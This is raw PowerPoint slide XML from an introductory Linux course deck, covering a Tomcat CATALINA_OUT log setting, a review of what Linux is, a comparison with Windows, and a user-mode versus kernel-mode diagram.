          <a:p>
            <a:pPr marL="0" marR="0" indent="0" algn="l"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rPr>
              <a:t>#    CATALINA_OUT    (Optional) Full path to a file where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stdout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stderr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>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rPr>
              <a:t>#                                   will be redirected.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0" algn="l"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rPr>
              <a:t>#                                   Default is $CATALINA_BASE/logs/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>catalina.out</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>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rPr>
              <a:t>[…]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  CATALINA_OUT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“$CATALINA_BASE”/logs/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>catalina.out</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4214731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Linux is a core </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>OS controlling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the computer hardware based on a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>UNIX </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>variant</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Heart of a Linux system is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kernel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Multiple Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>distributions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>essentially use the same </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Kernel</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25608" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Review: What Is Linux?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{BEBA8EAE-BF5A-486C-A8C5-ECC9F3942E4B}">
                <a14:imgProps xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                  <a14:imgLayer r:embed="rId4">
                    <a14:imgEffect>
                      <a14:backgroundRemoval t="1235" b="95062" l="4975" r="96020"/>
                    </a14:imgEffect>
                  </a14:imgLayer>
                </a14:imgProps>
              </a:ext>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1375787" y="3755729"/>
            <a:ext cx="1897221" cy="1529103"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Content Placeholder 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:extLst>
              <a:ext uri="{BEBA8EAE-BF5A-486C-A8C5-ECC9F3942E4B}">
                <a14:imgProps xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                  <a14:imgLayer r:embed="rId6">
                    <a14:imgEffect>
                      <a14:backgroundRemoval t="380" b="98099" l="9936" r="95833">
                        <a14:foregroundMark x1="31090" y1="39544" x2="31090" y2="39544"/>
                        <a14:foregroundMark x1="20513" y1="52471" x2="20513" y2="52471"/>
                        <a14:foregroundMark x1="58333" y1="17490" x2="58333" y2="17490"/>
                        <a14:foregroundMark x1="76282" y1="9125" x2="76282" y2="9125"/>
                        <a14:foregroundMark x1="75321" y1="85932" x2="75321" y2="85932"/>
                        <a14:foregroundMark x1="61218" y1="79848" x2="61218" y2="79848"/>
                      </a14:backgroundRemoval>
                    </a14:imgEffect>
                  </a14:imgLayer>
                </a14:imgProps>
              </a:ext>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2524002" y="4694449"/>
            <a:ext cx="1999643" cy="1685597"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Content Placeholder 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7" cstate="print">
            <a:extLst>
              <a:ext uri="{BEBA8EAE-BF5A-486C-A8C5-ECC9F3942E4B}">
                <a14:imgProps xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                  <a14:imgLayer r:embed="rId8">
                    <a14:imgEffect>
                      <a14:backgroundRemoval t="0" b="100000" l="0" r="99794">
                        <a14:foregroundMark x1="34774" y1="52990" x2="34774" y2="52990"/>
                        <a14:foregroundMark x1="48560" y1="35670" x2="48560" y2="35670"/>
                        <a14:foregroundMark x1="63992" y1="18557" x2="63992" y2="18557"/>
                        <a14:foregroundMark x1="50000" y1="14227" x2="50000" y2="13196"/>
                        <a14:foregroundMark x1="52058" y1="1856" x2="52058" y2="1856"/>
                        <a14:foregroundMark x1="33951" y1="12165" x2="33951" y2="12165"/>
                        <a14:foregroundMark x1="6790" y1="38144" x2="6790" y2="38144"/>
                        <a14:foregroundMark x1="16255" y1="70928" x2="16255" y2="70928"/>
                        <a14:foregroundMark x1="31276" y1="91753" x2="31276" y2="91753"/>
                        <a14:foregroundMark x1="45473" y1="78351" x2="45473" y2="78351"/>
                        <a14:foregroundMark x1="52675" y1="57113" x2="52675" y2="57113"/>
                        <a14:foregroundMark x1="47942" y1="52371" x2="47942" y2="52371"/>
                        <a14:foregroundMark x1="62551" y1="50309" x2="62551" y2="50309"/>
                        <a14:foregroundMark x1="83333" y1="43918" x2="83333" y2="43918"/>
                        <a14:foregroundMark x1="84774" y1="31546" x2="84774" y2="31546"/>
                        <a14:foregroundMark x1="80658" y1="21443" x2="80658" y2="21443"/>
                        <a14:foregroundMark x1="63992" y1="8454" x2="63992" y2="8454"/>
                        <a14:foregroundMark x1="34979" y1="14227" x2="31276" y2="18969"/>
                        <a14:foregroundMark x1="25720" y1="29485" x2="16872" y2="33608"/>
                        <a14:foregroundMark x1="10494" y1="43505" x2="10494" y2="45567"/>
                        <a14:foregroundMark x1="3704" y1="90309" x2="34362" y2="95670"/>
                        <a14:foregroundMark x1="54527" y1="90928" x2="89095" y2="70103"/>
                        <a14:foregroundMark x1="91152" y1="56495" x2="91152" y2="39794"/>
                        <a14:foregroundMark x1="86008" y1="47010" x2="19959" y2="75258"/>
                        <a14:foregroundMark x1="28601" y1="83093" x2="65021" y2="84742"/>
                        <a14:foregroundMark x1="35597" y1="93402" x2="49588" y2="22474"/>
                        <a14:foregroundMark x1="49588" y1="22474" x2="49588" y2="89691"/>
                        <a14:foregroundMark x1="48560" y1="25773" x2="75514" y2="15464"/>
                        <a14:foregroundMark x1="27778" y1="55876" x2="50617" y2="53402"/>
                        <a14:foregroundMark x1="20782" y1="88866" x2="43827" y2="84124"/>
                      </a14:backgroundRemoval>
                    </a14:imgEffect>
                  </a14:imgLayer>
                </a14:imgProps>
              </a:ext>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9130903" y="3626226"/>
            <a:ext cx="1700536" cy="1697037"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Content Placeholder 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9">
            <a:extLst>
              <a:ext uri="{BEBA8EAE-BF5A-486C-A8C5-ECC9F3942E4B}">
                <a14:imgProps xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                  <a14:imgLayer r:embed="rId10">
                    <a14:imgEffect>
                      <a14:backgroundRemoval t="0" b="97354" l="0" r="95238">
                        <a14:backgroundMark x1="54762" y1="20106" x2="53095" y2="19048"/>
                        <a14:backgroundMark x1="85238" y1="44444" x2="83571" y2="42328"/>
                        <a14:backgroundMark x1="80476" y1="70370" x2="84524" y2="73016"/>
                      </a14:backgroundRemoval>
                    </a14:imgEffect>
                  </a14:imgLayer>
                </a14:imgProps>
              </a:ext>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6717169" y="4395789"/>
            <a:ext cx="2276368" cy="2048731"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Content Placeholder 11"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11">
            <a:extLst>
              <a:ext uri="{BEBA8EAE-BF5A-486C-A8C5-ECC9F3942E4B}">
                <a14:imgProps xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                  <a14:imgLayer r:embed="rId12">
                    <a14:imgEffect>
                      <a14:backgroundRemoval t="1296" b="95464" l="2217" r="97291"/>
                    </a14:imgEffect>
                  </a14:imgLayer>
                </a14:imgProps>
              </a:ext>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4328123" y="3529214"/>
            <a:ext cx="2578233" cy="2940201"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3062912236"/>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Modularity and user privileges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Windows is not modular</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Automated functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Windows automates as many functions as possible for user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Linux can be setup to automate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Open-source and transparency</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Security through </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>v</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ariety</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Windows users make up about 90</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> of computer users and only vary by a </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>few versions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Linux varieties use different sets of tools and applications</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Comparing Windows</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39679916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182880" y="1611629"/>
            <a:ext cx="11807190" cy="3251989"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="20000"/>
              <a:lumOff val="80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A27C"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Rectangle 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="182880" y="2806922"/>
            <a:ext cx="11807190" cy="309590"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="40000"/>
              <a:lumOff val="60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A27C"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Comparing Windows </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="354399" y="2399503"/>
            <a:ext cx="1405890" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="00A47E"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>User</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00776D"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Rectangle 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="182880" y="4933140"/>
            <a:ext cx="11807190" cy="1587975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="20000"/>
              <a:lumOff val="80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A27C"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rectangle 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="182880" y="5467708"/>
            <a:ext cx="11807190" cy="309590"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="40000"/>
              <a:lumOff val="60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A27C"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rectangle 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2030816" y="5624516"/>
            <a:ext cx="9774679" cy="534565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">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r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SCHEDULER, SYSTEM CALLS, BASIC IPC</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Rectangle 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2016472" y="5054561"/>
            <a:ext cx="9789024" cy="569953"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:lumMod val="50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Microkernel</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="354399" y="5058571"/>
            <a:ext cx="1405890" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="00A47E"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Kernel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="TextBox 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2030815" y="1737874"/>
            <a:ext cx="9774679" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="00A47E"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User Applications (DB, Web, Net Tools, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
